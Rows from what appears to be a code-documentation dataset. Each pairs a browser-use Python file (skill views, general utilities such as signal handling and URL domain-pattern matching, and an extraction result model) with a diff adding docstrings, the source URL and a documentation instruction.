from pydantic import BaseModel, ConfigDict, Field
class MissingCookieException(Exception):
def __init__(self, cookie_name: str, cookie_description: str):
self.cookie_name = cookie_name
self.cookie_description = cookie_description
super().__init__(f"Missing required cookie '{cookie_name}': {cookie_description}")
class Skill(BaseModel):
model_config = ConfigDict(extra='forbid', validate_assignment=True)
id: str
title: str
description: str
parameters: list[ParameterSchema]
output_schema: dict[str, Any] = Field(default_factory=dict)
@staticmethod
def from_skill_response(response: SkillResponse) -> 'Skill':
return Skill(
id=response.id,
title=response.title,
description=response.description,
parameters=response.parameters,
output_schema=response.output_schema,
)
def parameters_pydantic(self, exclude_cookies: bool = False) -> type[BaseModel]:
from browser_use.skills.utils import convert_parameters_to_pydantic
parameters = list[ParameterSchema](self.parameters)
if exclude_cookies:
parameters = [param for param in parameters if param.type != 'cookie']
return convert_parameters_to_pydantic(parameters, model_name=f'{self.title}Parameters')
@property
def output_type_pydantic(self) -> type[BaseModel] | None:
if not self.output_schema:
return None
from browser_use.skills.utils import convert_json_schema_to_pydantic
return convert_json_schema_to_pydantic(self.output_schema, model_name=f'{self.title}Output') | --- +++ @@ -1,3 +1,4 @@+"""Skills views - wraps SDK types with helper methods"""
from typing import Any
@@ -7,6 +8,12 @@
class MissingCookieException(Exception):
+ """Raised when a required cookie is missing for skill execution
+
+ Attributes:
+ cookie_name: The name of the missing cookie parameter
+ cookie_description: Description of how to obtain the cookie
+ """
def __init__(self, cookie_name: str, cookie_description: str):
self.cookie_name = cookie_name
@@ -15,6 +22,11 @@
class Skill(BaseModel):
+ """Skill model with helper methods for LLM integration
+
+ This wraps the SDK SkillResponse with additional helper properties
+ for converting schemas to Pydantic models.
+ """
model_config = ConfigDict(extra='forbid', validate_assignment=True)
@@ -26,6 +38,7 @@
@staticmethod
def from_skill_response(response: SkillResponse) -> 'Skill':
+ """Create a Skill from SDK SkillResponse"""
return Skill(
id=response.id,
title=response.title,
@@ -35,6 +48,10 @@ )
def parameters_pydantic(self, exclude_cookies: bool = False) -> type[BaseModel]:
+ """Convert parameter schemas to a pydantic model for structured output
+
+ exclude_cookies is very useful when dealing with LLMs that are not aware of cookies.
+ """
from browser_use.skills.utils import convert_parameters_to_pydantic
parameters = list[ParameterSchema](self.parameters)
@@ -46,9 +63,10 @@
@property
def output_type_pydantic(self) -> type[BaseModel] | None:
+ """Convert output schema to a pydantic model for structured output"""
if not self.output_schema:
return None
from browser_use.skills.utils import convert_json_schema_to_pydantic
- return convert_json_schema_to_pydantic(self.output_schema, model_name=f'{self.title}Output')+ return convert_json_schema_to_pydantic(self.output_schema, model_name=f'{self.title}Output')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skills/views.py |
Add documentation for all methods | import asyncio
import logging
import os
import platform
import re
import signal
import time
from collections.abc import Callable, Coroutine
from fnmatch import fnmatch
from functools import cache, wraps
from pathlib import Path
from sys import stderr
from typing import Any, ParamSpec, TypeVar
from urllib.parse import urlparse
import httpx
from dotenv import load_dotenv
load_dotenv()
# Pre-compiled regex for URL detection - used in URL shortening
URL_PATTERN = re.compile(r'https?://[^\s<>"\']+|www\.[^\s<>"\']+|[^\s<>"\']+\.[a-z]{2,}(?:/[^\s<>"\']*)?', re.IGNORECASE)
logger = logging.getLogger(__name__)
# Lazy import for error types
# Use sentinel to avoid retrying import when package is not installed
_IMPORT_NOT_FOUND: type = type('_ImportNotFound', (), {})
_openai_bad_request_error: type | None = None
_groq_bad_request_error: type | None = None
def _get_openai_bad_request_error() -> type | None:
global _openai_bad_request_error
if _openai_bad_request_error is None:
try:
from openai import BadRequestError
_openai_bad_request_error = BadRequestError
except ImportError:
_openai_bad_request_error = _IMPORT_NOT_FOUND
return _openai_bad_request_error if _openai_bad_request_error is not _IMPORT_NOT_FOUND else None
def _get_groq_bad_request_error() -> type | None:
global _groq_bad_request_error
if _groq_bad_request_error is None:
try:
from groq import BadRequestError # type: ignore[import-not-found]
_groq_bad_request_error = BadRequestError
except ImportError:
_groq_bad_request_error = _IMPORT_NOT_FOUND
return _groq_bad_request_error if _groq_bad_request_error is not _IMPORT_NOT_FOUND else None
# Global flag to prevent duplicate exit messages
_exiting = False
# Define generic type variables for return type and parameters
R = TypeVar('R')
T = TypeVar('T')
P = ParamSpec('P')
class SignalHandler:
def __init__(
self,
loop: asyncio.AbstractEventLoop | None = None,
pause_callback: Callable[[], None] | None = None,
resume_callback: Callable[[], None] | None = None,
custom_exit_callback: Callable[[], None] | None = None,
exit_on_second_int: bool = True,
interruptible_task_patterns: list[str] | None = None,
):
self.loop = loop or asyncio.get_event_loop()
self.pause_callback = pause_callback
self.resume_callback = resume_callback
self.custom_exit_callback = custom_exit_callback
self.exit_on_second_int = exit_on_second_int
self.interruptible_task_patterns = interruptible_task_patterns or ['step', 'multi_act', 'get_next_action']
self.is_windows = platform.system() == 'Windows'
# Initialize loop state attributes
self._initialize_loop_state()
# Store original signal handlers to restore them later if needed
self.original_sigint_handler = None
self.original_sigterm_handler = None
def _initialize_loop_state(self) -> None:
setattr(self.loop, 'ctrl_c_pressed', False)
setattr(self.loop, 'waiting_for_input', False)
def register(self) -> None:
try:
if self.is_windows:
# On Windows, use simple signal handling with immediate exit on Ctrl+C
def windows_handler(sig, frame):
print('\n\n🛑 Got Ctrl+C. Exiting immediately on Windows...\n', file=stderr)
# Run the custom exit callback if provided
if self.custom_exit_callback:
self.custom_exit_callback()
os._exit(0)
self.original_sigint_handler = signal.signal(signal.SIGINT, windows_handler)
else:
# On Unix-like systems, use asyncio's signal handling for smoother experience
self.original_sigint_handler = self.loop.add_signal_handler(signal.SIGINT, lambda: self.sigint_handler())
self.original_sigterm_handler = self.loop.add_signal_handler(signal.SIGTERM, lambda: self.sigterm_handler())
except Exception:
# there are situations where signal handlers are not supported, e.g.
# - when running in a thread other than the main thread
# - some operating systems
# - inside jupyter notebooks
pass
def unregister(self) -> None:
try:
if self.is_windows:
# On Windows, just restore the original SIGINT handler
if self.original_sigint_handler:
signal.signal(signal.SIGINT, self.original_sigint_handler)
else:
# On Unix-like systems, use asyncio's signal handler removal
self.loop.remove_signal_handler(signal.SIGINT)
self.loop.remove_signal_handler(signal.SIGTERM)
# Restore original handlers if available
if self.original_sigint_handler:
signal.signal(signal.SIGINT, self.original_sigint_handler)
if self.original_sigterm_handler:
signal.signal(signal.SIGTERM, self.original_sigterm_handler)
except Exception as e:
logger.warning(f'Error while unregistering signal handlers: {e}')
def _handle_second_ctrl_c(self) -> None:
global _exiting
if not _exiting:
_exiting = True
# Call custom exit callback if provided
if self.custom_exit_callback:
try:
self.custom_exit_callback()
except Exception as e:
logger.error(f'Error in exit callback: {e}')
# Force immediate exit - more reliable than sys.exit()
print('\n\n🛑 Got second Ctrl+C. Exiting immediately...\n', file=stderr)
# Reset terminal to a clean state by sending multiple escape sequences
# Order matters for terminal resets - we try different approaches
# Reset terminal modes for both stdout and stderr
print('\033[?25h', end='', flush=True, file=stderr) # Show cursor
print('\033[?25h', end='', flush=True) # Show cursor
# Reset text attributes and terminal modes
print('\033[0m', end='', flush=True, file=stderr) # Reset text attributes
print('\033[0m', end='', flush=True) # Reset text attributes
# Disable special input modes that may cause arrow keys to output control chars
print('\033[?1l', end='', flush=True, file=stderr) # Reset cursor keys to normal mode
print('\033[?1l', end='', flush=True) # Reset cursor keys to normal mode
# Disable bracketed paste mode
print('\033[?2004l', end='', flush=True, file=stderr)
print('\033[?2004l', end='', flush=True)
# Carriage return helps ensure a clean line
print('\r', end='', flush=True, file=stderr)
print('\r', end='', flush=True)
# these ^^ attempts dont work as far as we can tell
# we still dont know what causes the broken input, if you know how to fix it, please let us know
print('(tip: press [Enter] once to fix escape codes appearing after chrome exit)', file=stderr)
os._exit(0)
def sigint_handler(self) -> None:
global _exiting
if _exiting:
# Already exiting, force exit immediately
os._exit(0)
if getattr(self.loop, 'ctrl_c_pressed', False):
# If we're in the waiting for input state, let the pause method handle it
if getattr(self.loop, 'waiting_for_input', False):
return
# Second Ctrl+C - exit immediately if configured to do so
if self.exit_on_second_int:
self._handle_second_ctrl_c()
# Mark that Ctrl+C was pressed
setattr(self.loop, 'ctrl_c_pressed', True)
# Cancel current tasks that should be interruptible - this is crucial for immediate pausing
self._cancel_interruptible_tasks()
# Call pause callback if provided - this sets the paused flag
if self.pause_callback:
try:
self.pause_callback()
except Exception as e:
logger.error(f'Error in pause callback: {e}')
# Log pause message after pause_callback is called (not before)
print('----------------------------------------------------------------------', file=stderr)
def sigterm_handler(self) -> None:
global _exiting
if not _exiting:
_exiting = True
print('\n\n🛑 SIGTERM received. Exiting immediately...\n\n', file=stderr)
# Call custom exit callback if provided
if self.custom_exit_callback:
self.custom_exit_callback()
os._exit(0)
def _cancel_interruptible_tasks(self) -> None:
current_task = asyncio.current_task(self.loop)
for task in asyncio.all_tasks(self.loop):
if task != current_task and not task.done():
task_name = task.get_name() if hasattr(task, 'get_name') else str(task)
# Cancel tasks that match certain patterns
if any(pattern in task_name for pattern in self.interruptible_task_patterns):
logger.debug(f'Cancelling task: {task_name}')
task.cancel()
# Add exception handler to silence "Task exception was never retrieved" warnings
task.add_done_callback(lambda t: t.exception() if t.cancelled() else None)
# Also cancel the current task if it's interruptible
if current_task and not current_task.done():
task_name = current_task.get_name() if hasattr(current_task, 'get_name') else str(current_task)
if any(pattern in task_name for pattern in self.interruptible_task_patterns):
logger.debug(f'Cancelling current task: {task_name}')
current_task.cancel()
def wait_for_resume(self) -> None:
# Set flag to indicate we're waiting for input
setattr(self.loop, 'waiting_for_input', True)
# Temporarily restore default signal handling for SIGINT
# This ensures KeyboardInterrupt will be raised during input()
original_handler = signal.getsignal(signal.SIGINT)
try:
signal.signal(signal.SIGINT, signal.default_int_handler)
except ValueError:
# we are running in a thread other than the main thread
# or signal handlers are not supported for some other reason
pass
green = '\x1b[32;1m'
red = '\x1b[31m'
blink = '\033[33;5m'
unblink = '\033[0m'
reset = '\x1b[0m'
try: # escape code is to blink the ...
print(
f'➡️ Press {green}[Enter]{reset} to resume or {red}[Ctrl+C]{reset} again to exit{blink}...{unblink} ',
end='',
flush=True,
file=stderr,
)
input() # This will raise KeyboardInterrupt on Ctrl+C
# Call resume callback if provided
if self.resume_callback:
self.resume_callback()
except KeyboardInterrupt:
# Use the shared method to handle second Ctrl+C
self._handle_second_ctrl_c()
finally:
try:
# Restore our signal handler
signal.signal(signal.SIGINT, original_handler)
setattr(self.loop, 'waiting_for_input', False)
except Exception:
pass
def reset(self) -> None:
# Clear the flags
if hasattr(self.loop, 'ctrl_c_pressed'):
setattr(self.loop, 'ctrl_c_pressed', False)
if hasattr(self.loop, 'waiting_for_input'):
setattr(self.loop, 'waiting_for_input', False)
def time_execution_sync(additional_text: str = '') -> Callable[[Callable[P, R]], Callable[P, R]]:
def decorator(func: Callable[P, R]) -> Callable[P, R]:
@wraps(func)
def wrapper(*args: P.args, **kwargs: P.kwargs) -> R:
start_time = time.time()
result = func(*args, **kwargs)
execution_time = time.time() - start_time
# Only log if execution takes more than 0.25 seconds
if execution_time > 0.25:
self_has_logger = args and getattr(args[0], 'logger', None)
if self_has_logger:
logger = getattr(args[0], 'logger')
elif 'agent' in kwargs:
logger = getattr(kwargs['agent'], 'logger')
elif 'browser_session' in kwargs:
logger = getattr(kwargs['browser_session'], 'logger')
else:
logger = logging.getLogger(__name__)
logger.debug(f'⏳ {additional_text.strip("-")}() took {execution_time:.2f}s')
return result
return wrapper
return decorator
def time_execution_async(
additional_text: str = '',
) -> Callable[[Callable[P, Coroutine[Any, Any, R]]], Callable[P, Coroutine[Any, Any, R]]]:
def decorator(func: Callable[P, Coroutine[Any, Any, R]]) -> Callable[P, Coroutine[Any, Any, R]]:
@wraps(func)
async def wrapper(*args: P.args, **kwargs: P.kwargs) -> R:
start_time = time.time()
result = await func(*args, **kwargs)
execution_time = time.time() - start_time
# Only log if execution takes more than 0.25 seconds to avoid spamming the logs
# you can lower this threshold locally when you're doing dev work to performance optimize stuff
if execution_time > 0.25:
self_has_logger = args and getattr(args[0], 'logger', None)
if self_has_logger:
logger = getattr(args[0], 'logger')
elif 'agent' in kwargs:
logger = getattr(kwargs['agent'], 'logger')
elif 'browser_session' in kwargs:
logger = getattr(kwargs['browser_session'], 'logger')
else:
logger = logging.getLogger(__name__)
logger.debug(f'⏳ {additional_text.strip("-")}() took {execution_time:.2f}s')
return result
return wrapper
return decorator
def singleton(cls):
instance = [None]
def wrapper(*args, **kwargs):
if instance[0] is None:
instance[0] = cls(*args, **kwargs)
return instance[0]
return wrapper
def check_env_variables(keys: list[str], any_or_all=all) -> bool:
return any_or_all(os.getenv(key, '').strip() for key in keys)
def is_unsafe_pattern(pattern: str) -> bool:
# Extract domain part if there's a scheme
if '://' in pattern:
_, pattern = pattern.split('://', 1)
# Remove safe patterns (*.domain and domain.*)
bare_domain = pattern.replace('.*', '').replace('*.', '')
# If there are still wildcards, it's potentially unsafe
return '*' in bare_domain
def is_new_tab_page(url: str) -> bool:
return url in ('about:blank', 'chrome://new-tab-page/', 'chrome://new-tab-page', 'chrome://newtab/', 'chrome://newtab')
def match_url_with_domain_pattern(url: str, domain_pattern: str, log_warnings: bool = False) -> bool:
try:
# Note: new tab pages should be handled at the callsite, not here
if is_new_tab_page(url):
return False
parsed_url = urlparse(url)
# Extract only the hostname and scheme components
scheme = parsed_url.scheme.lower() if parsed_url.scheme else ''
domain = parsed_url.hostname.lower() if parsed_url.hostname else ''
if not scheme or not domain:
return False
# Normalize the domain pattern
domain_pattern = domain_pattern.lower()
# Handle pattern with scheme
if '://' in domain_pattern:
pattern_scheme, pattern_domain = domain_pattern.split('://', 1)
else:
pattern_scheme = 'https' # Default to matching only https for security
pattern_domain = domain_pattern
# Handle port in pattern (we strip ports from patterns since we already
# extracted only the hostname from the URL)
if ':' in pattern_domain and not pattern_domain.startswith(':'):
pattern_domain = pattern_domain.split(':', 1)[0]
# If scheme doesn't match, return False
if not fnmatch(scheme, pattern_scheme):
return False
# Check for exact match
if pattern_domain == '*' or domain == pattern_domain:
return True
# Handle glob patterns
if '*' in pattern_domain:
# Check for unsafe glob patterns
# First, check for patterns like *.*.domain which are unsafe
if pattern_domain.count('*.') > 1 or pattern_domain.count('.*') > 1:
if log_warnings:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Multiple wildcards in pattern=[{domain_pattern}] are not supported')
return False # Don't match unsafe patterns
# Check for wildcards in TLD part (example.*)
if pattern_domain.endswith('.*'):
if log_warnings:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Wildcard TLDs like in pattern=[{domain_pattern}] are not supported for security')
return False # Don't match unsafe patterns
# Then check for embedded wildcards
bare_domain = pattern_domain.replace('*.', '')
if '*' in bare_domain:
if log_warnings:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Only *.domain style patterns are supported, ignoring pattern=[{domain_pattern}]')
return False # Don't match unsafe patterns
# Special handling so that *.google.com also matches bare google.com
if pattern_domain.startswith('*.'):
parent_domain = pattern_domain[2:]
if domain == parent_domain or fnmatch(domain, parent_domain):
return True
# Normal case: match domain against pattern
if fnmatch(domain, pattern_domain):
return True
return False
except Exception as e:
logger = logging.getLogger(__name__)
logger.error(f'⛔️ Error matching URL {url} with pattern {domain_pattern}: {type(e).__name__}: {e}')
return False
def merge_dicts(a: dict, b: dict, path: tuple[str, ...] = ()):
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
merge_dicts(a[key], b[key], path + (str(key),))
elif isinstance(a[key], list) and isinstance(b[key], list):
a[key] = a[key] + b[key]
elif a[key] != b[key]:
raise Exception('Conflict at ' + '.'.join(path + (str(key),)))
else:
a[key] = b[key]
return a
@cache
def get_browser_use_version() -> str:
	"""Return the installed browser-use version string.

	Resolution order: the ``version = "..."`` field of the repository's
	``pyproject.toml`` (source checkouts), then installed package metadata
	(pip installs). Returns ``'unknown'`` on any error. The result is cached
	for the process lifetime and exported as ``LIBRARY_VERSION`` in
	``os.environ`` (used by bubus event_schema so all Event schemas include
	versioning).
	"""
	try:
		import re

		pyproject = Path(__file__).parent.parent / 'pyproject.toml'
		if pyproject.exists():
			found = re.search(r'version\s*=\s*["\']([^"\']+)["\']', pyproject.read_text(encoding='utf-8'))
			if found:
				detected = found.group(1)
				os.environ['LIBRARY_VERSION'] = detected
				return detected

		# No pyproject.toml (or no version field in it): ask the package metadata
		from importlib.metadata import version as get_version

		detected = str(get_version('browser-use'))
		os.environ['LIBRARY_VERSION'] = detected
		return detected
	except Exception as e:
		logger.debug(f'Error detecting browser-use version: {type(e).__name__}: {e}')
		return 'unknown'
async def check_latest_browser_use_version() -> str | None:
	"""Fetch the newest published browser-use version from PyPI.

	Best-effort with a 3-second timeout: any network, HTTP, or parsing
	problem returns ``None`` instead of raising, so agent startup is never
	blocked by this informational check.
	"""
	latest: str | None = None
	try:
		async with httpx.AsyncClient(timeout=3.0) as client:
			resp = await client.get('https://pypi.org/pypi/browser-use/json')
			if resp.status_code == 200:
				latest = resp.json()['info']['version']
	except Exception:
		# Silently fail - we don't want to break agent startup due to network issues
		pass
	return latest
@cache
def get_git_info() -> dict[str, str] | None:
	"""Collect git metadata for source checkouts of browser-use.

	Returns a dict with ``commit_hash``, ``branch``, ``remote_url`` and
	``commit_timestamp``, or ``None`` when there is no ``.git`` directory
	(i.e. not installed from a git checkout) or any git command fails.
	Cached for the lifetime of the process.
	"""
	try:
		import subprocess

		repo_root = Path(__file__).parent.parent
		if not (repo_root / '.git').exists():
			return None

		def run_git(*args: str) -> str:
			# stderr is discarded so a broken git setup fails quietly into the except below
			return subprocess.check_output(['git', *args], cwd=repo_root, stderr=subprocess.DEVNULL).decode().strip()

		return {
			'commit_hash': run_git('rev-parse', 'HEAD'),
			'branch': run_git('rev-parse', '--abbrev-ref', 'HEAD'),
			'remote_url': run_git('config', '--get', 'remote.origin.url'),
			'commit_timestamp': run_git('show', '-s', '--format=%ci', 'HEAD'),
		}
	except Exception as e:
		logger.debug(f'Error getting git info: {type(e).__name__}: {e}')
		return None
def _log_pretty_path(path: str | Path | None) -> str:
if not path or not str(path).strip():
return '' # always falsy in -> falsy out so it can be used in ternaries
# dont print anything thats not a path
if not isinstance(path, (str, Path)):
# no other types are safe to just str(path) and log to terminal unless we know what they are
# e.g. what if we get storage_date=dict | Path and the dict version could contain real cookies
return f'<{type(path).__name__}>'
# replace home dir and cwd with ~ and .
pretty_path = str(path).replace(str(Path.home()), '~').replace(str(Path.cwd().resolve()), '.')
# wrap in quotes if it contains spaces
if pretty_path.strip() and ' ' in pretty_path:
pretty_path = f'"{pretty_path}"'
return pretty_path
def _log_pretty_url(s: str, max_len: int | None = 22) -> str:
s = s.replace('https://', '').replace('http://', '').replace('www.', '')
if max_len is not None and len(s) > max_len:
return s[:max_len] + '…'
return s
def create_task_with_error_handling(
	coro: Coroutine[Any, Any, T],
	*,
	name: str | None = None,
	logger_instance: logging.Logger | None = None,
	suppress_exceptions: bool = False,
) -> asyncio.Task[T]:
	"""Create an asyncio task whose exception is always observed (and logged).

	Prevents "Task exception was never retrieved" warnings for fire-and-forget
	tasks by attaching a done-callback that retrieves and logs any exception.

	Args:
		coro: The coroutine to schedule.
		name: Optional task name (shown in log messages; useful for debugging).
		logger_instance: Logger to use; defaults to this module's ``logger``.
		suppress_exceptions: If True, exceptions are only logged (ERROR level).
			If False, they are logged at WARNING level and then re-raised from
			the callback so they propagate to the event loop's exception handler.

	Returns:
		The created ``asyncio.Task``.
	"""
	task = asyncio.create_task(coro, name=name)
	log = logger_instance or logger

	def _handle_task_exception(t: asyncio.Task[T]) -> None:
		"""Done-callback: retrieve the task's exception, log it, optionally re-raise."""
		exc_to_raise = None
		try:
			# This will raise if the task had an exception
			exc = t.exception()
			if exc is not None:
				task_name = t.get_name() if hasattr(t, 'get_name') else 'unnamed'
				if suppress_exceptions:
					log.error(f'Exception in background task [{task_name}]: {type(exc).__name__}: {exc}', exc_info=exc)
				else:
					# Log at warning level then mark for re-raising
					log.warning(
						f'Exception in background task [{task_name}]: {type(exc).__name__}: {exc}',
						exc_info=exc,
					)
					exc_to_raise = exc
		except asyncio.CancelledError:
			# Task was cancelled, this is normal behavior
			pass
		except Exception as e:
			# Catch any other exception during exception handling (e.g., t.exception() itself failing)
			task_name = t.get_name() if hasattr(t, 'get_name') else 'unnamed'
			log.error(f'Error handling exception in task [{task_name}]: {type(e).__name__}: {e}')
		# Re-raise outside the try-except block so it propagates to the event loop
		if exc_to_raise is not None:
			raise exc_to_raise

	task.add_done_callback(_handle_task_exception)
	return task
def sanitize_surrogates(text: str) -> str:
	"""Strip lone UTF-16 surrogate code points (U+D800..U+DFFF) from ``text``.

	Such code points cannot be encoded as UTF-8 and would crash a later
	``.encode('utf-8')``; every other character passes through unchanged.
	"""
	# Surrogates are the only code points a str can hold that UTF-8 cannot encode,
	# so filtering them out is equivalent to encode('utf-8', errors='ignore').decode().
	return ''.join(ch for ch in text if not '\ud800' <= ch <= '\udfff')
def _get_openai_bad_request_error() -> type | None:
+ """Lazy loader for OpenAI BadRequestError."""
global _openai_bad_request_error
if _openai_bad_request_error is None:
try:
@@ -44,6 +45,7 @@
def _get_groq_bad_request_error() -> type | None:
+ """Lazy loader for Groq BadRequestError."""
global _groq_bad_request_error
if _groq_bad_request_error is None:
try:
@@ -65,6 +67,17 @@
class SignalHandler:
+ """
+ A modular and reusable signal handling system for managing SIGINT (Ctrl+C), SIGTERM,
+ and other signals in asyncio applications.
+
+ This class provides:
+ - Configurable signal handling for SIGINT and SIGTERM
+ - Support for custom pause/resume callbacks
+ - Management of event loop state across signals
+ - Standardized handling of first and second Ctrl+C presses
+ - Cross-platform compatibility (with simplified behavior on Windows)
+ """
def __init__(
self,
@@ -75,6 +88,18 @@ exit_on_second_int: bool = True,
interruptible_task_patterns: list[str] | None = None,
):
+ """
+ Initialize the signal handler.
+
+ Args:
+ loop: The asyncio event loop to use. Defaults to current event loop.
+ pause_callback: Function to call when system is paused (first Ctrl+C)
+ resume_callback: Function to call when system is resumed
+ custom_exit_callback: Function to call on exit (second Ctrl+C or SIGTERM)
+ exit_on_second_int: Whether to exit on second SIGINT (Ctrl+C)
+ interruptible_task_patterns: List of patterns to match task names that should be
+ canceled on first Ctrl+C (default: ['step', 'multi_act', 'get_next_action'])
+ """
self.loop = loop or asyncio.get_event_loop()
self.pause_callback = pause_callback
self.resume_callback = resume_callback
@@ -91,10 +116,12 @@ self.original_sigterm_handler = None
def _initialize_loop_state(self) -> None:
+ """Initialize loop state attributes used for signal handling."""
setattr(self.loop, 'ctrl_c_pressed', False)
setattr(self.loop, 'waiting_for_input', False)
def register(self) -> None:
+ """Register signal handlers for SIGINT and SIGTERM."""
try:
if self.is_windows:
# On Windows, use simple signal handling with immediate exit on Ctrl+C
@@ -119,6 +146,7 @@ pass
def unregister(self) -> None:
+ """Unregister signal handlers and restore original handlers if possible."""
try:
if self.is_windows:
# On Windows, just restore the original SIGINT handler
@@ -138,6 +166,10 @@ logger.warning(f'Error while unregistering signal handlers: {e}')
def _handle_second_ctrl_c(self) -> None:
+ """
+ Handle a second Ctrl+C press by performing cleanup and exiting.
+ This is shared logic used by both sigint_handler and wait_for_resume.
+ """
global _exiting
if not _exiting:
@@ -183,6 +215,12 @@ os._exit(0)
def sigint_handler(self) -> None:
+ """
+ SIGINT (Ctrl+C) handler.
+
+ First Ctrl+C: Cancel current step and pause.
+ Second Ctrl+C: Exit immediately if exit_on_second_int is True.
+ """
global _exiting
if _exiting:
@@ -215,6 +253,11 @@ print('----------------------------------------------------------------------', file=stderr)
def sigterm_handler(self) -> None:
+ """
+ SIGTERM handler.
+
+ Always exits the program completely.
+ """
global _exiting
if not _exiting:
_exiting = True
@@ -227,6 +270,7 @@ os._exit(0)
def _cancel_interruptible_tasks(self) -> None:
+ """Cancel current tasks that should be interruptible."""
current_task = asyncio.current_task(self.loop)
for task in asyncio.all_tasks(self.loop):
if task != current_task and not task.done():
@@ -246,6 +290,13 @@ current_task.cancel()
def wait_for_resume(self) -> None:
+ """
+ Wait for user input to resume or exit.
+
+ This method should be called after handling the first Ctrl+C.
+ It temporarily restores default signal handling to allow catching
+ a second Ctrl+C directly.
+ """
# Set flag to indicate we're waiting for input
setattr(self.loop, 'waiting_for_input', True)
@@ -289,6 +340,7 @@ pass
def reset(self) -> None:
+ """Reset state after resuming."""
# Clear the flags
if hasattr(self.loop, 'ctrl_c_pressed'):
setattr(self.loop, 'ctrl_c_pressed', False)
@@ -363,10 +415,20 @@
def check_env_variables(keys: list[str], any_or_all=all) -> bool:
+ """Check if all required environment variables are set"""
return any_or_all(os.getenv(key, '').strip() for key in keys)
def is_unsafe_pattern(pattern: str) -> bool:
+ """
+ Check if a domain pattern has complex wildcards that could match too many domains.
+
+ Args:
+ pattern: The domain pattern to check
+
+ Returns:
+ bool: True if the pattern has unsafe wildcards, False otherwise
+ """
# Extract domain part if there's a scheme
if '://' in pattern:
_, pattern = pattern.split('://', 1)
@@ -379,10 +441,41 @@
def is_new_tab_page(url: str) -> bool:
+ """
+ Check if a URL is a new tab page (about:blank, chrome://new-tab-page, or chrome://newtab).
+
+ Args:
+ url: The URL to check
+
+ Returns:
+ bool: True if the URL is a new tab page, False otherwise
+ """
return url in ('about:blank', 'chrome://new-tab-page/', 'chrome://new-tab-page', 'chrome://newtab/', 'chrome://newtab')
def match_url_with_domain_pattern(url: str, domain_pattern: str, log_warnings: bool = False) -> bool:
+ """
+ Check if a URL matches a domain pattern. SECURITY CRITICAL.
+
+ Supports optional glob patterns and schemes:
+ - *.example.com will match sub.example.com and example.com
+ - *google.com will match google.com, agoogle.com, and www.google.com
+ - http*://example.com will match http://example.com, https://example.com
+ - chrome-extension://* will match chrome-extension://aaaaaaaaaaaa and chrome-extension://bbbbbbbbbbbbb
+
+ When no scheme is specified, https is used by default for security.
+ For example, 'example.com' will match 'https://example.com' but not 'http://example.com'.
+
+ Note: New tab pages (about:blank, chrome://new-tab-page) must be handled at the callsite, not inside this function.
+
+ Args:
+ url: The URL to check
+ domain_pattern: Domain pattern to match against
+ log_warnings: Whether to log warnings about unsafe patterns
+
+ Returns:
+ bool: True if the URL matches the pattern, False otherwise
+ """
try:
# Note: new tab pages should be handled at the callsite, not here
if is_new_tab_page(url):
@@ -478,6 +571,7 @@
@cache
def get_browser_use_version() -> str:
+ """Get the browser-use package version using the same logic as Agent._set_browser_use_version_and_source"""
try:
package_root = Path(__file__).parent.parent
pyproject_path = package_root / 'pyproject.toml'
@@ -507,6 +601,11 @@
async def check_latest_browser_use_version() -> str | None:
+ """Check the latest version of browser-use from PyPI asynchronously.
+
+ Returns:
+ The latest version string if successful, None if failed
+ """
try:
async with httpx.AsyncClient(timeout=3.0) as client:
response = await client.get('https://pypi.org/pypi/browser-use/json')
@@ -521,6 +620,7 @@
@cache
def get_git_info() -> dict[str, str] | None:
+ """Get git information if installed from git repository"""
try:
import subprocess
@@ -562,6 +662,7 @@
def _log_pretty_path(path: str | Path | None) -> str:
+ """Pretty-print a path, shorten home dir to ~ and cwd to ."""
if not path or not str(path).strip():
return '' # always falsy in -> falsy out so it can be used in ternaries
@@ -583,6 +684,7 @@
def _log_pretty_url(s: str, max_len: int | None = 22) -> str:
+ """Truncate/pretty-print a URL with a maximum length, removing the protocol and www. prefix"""
s = s.replace('https://', '').replace('http://', '').replace('www.', '')
if max_len is not None and len(s) > max_len:
return s[:max_len] + '…'
@@ -596,10 +698,33 @@ logger_instance: logging.Logger | None = None,
suppress_exceptions: bool = False,
) -> asyncio.Task[T]:
+ """
+ Create an asyncio task with proper exception handling to prevent "Task exception was never retrieved" warnings.
+
+ Args:
+ coro: The coroutine to wrap in a task
+ name: Optional name for the task (useful for debugging)
+ logger_instance: Optional logger instance to use. If None, uses module logger.
+ suppress_exceptions: If True, logs exceptions at ERROR level. If False, logs at WARNING level
+ and exceptions remain retrievable via task.exception() if the caller awaits the task.
+ Default False.
+
+ Returns:
+ asyncio.Task: The created task with exception handling callback
+
+ Example:
+ # Fire-and-forget with suppressed exceptions
+ create_task_with_error_handling(some_async_function(), name="my_task", suppress_exceptions=True)
+
+ # Task with retrievable exceptions (if you plan to await it)
+ task = create_task_with_error_handling(critical_function(), name="critical")
+ result = await task # Will raise the exception if one occurred
+ """
task = asyncio.create_task(coro, name=name)
log = logger_instance or logger
def _handle_task_exception(t: asyncio.Task[T]) -> None:
+ """Callback to handle task exceptions"""
exc_to_raise = None
try:
# This will raise if the task had an exception
@@ -632,4 +757,15 @@
def sanitize_surrogates(text: str) -> str:
- return text.encode('utf-8', errors='ignore').decode('utf-8')+ """Remove surrogate characters that can't be encoded in UTF-8.
+
+ Surrogate pairs (U+D800 to U+DFFF) are invalid in UTF-8 when unpaired.
+ These often appear in DOM content from mathematical symbols or emojis.
+
+ Args:
+ text: The text to sanitize
+
+ Returns:
+ Text with surrogate characters removed
+ """
+ return text.encode('utf-8', errors='ignore').decode('utf-8')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/utils.py |
Document helper functions with docstrings |
from typing import Any
from pydantic import BaseModel, ConfigDict, Field
class ExtractionResult(BaseModel):
	"""Result of a schema-enforced data extraction, with provenance metadata."""

	# extra='forbid': reject unknown keys so instances match the declared fields exactly
	model_config = ConfigDict(extra='forbid')
	data: dict[str, Any] = Field(description='The validated extraction payload')
	schema_used: dict[str, Any] = Field(description='The JSON Schema that was enforced')
	is_partial: bool = Field(default=False, description='True if content was truncated before extraction')
	source_url: str | None = Field(default=None, description='URL the content was extracted from')
	content_stats: dict[str, Any] = Field(default_factory=dict, description='Content processing statistics')
from typing import Any
@@ -5,6 +6,7 @@
class ExtractionResult(BaseModel):
+ """Metadata about a structured extraction, stored in ActionResult.metadata."""
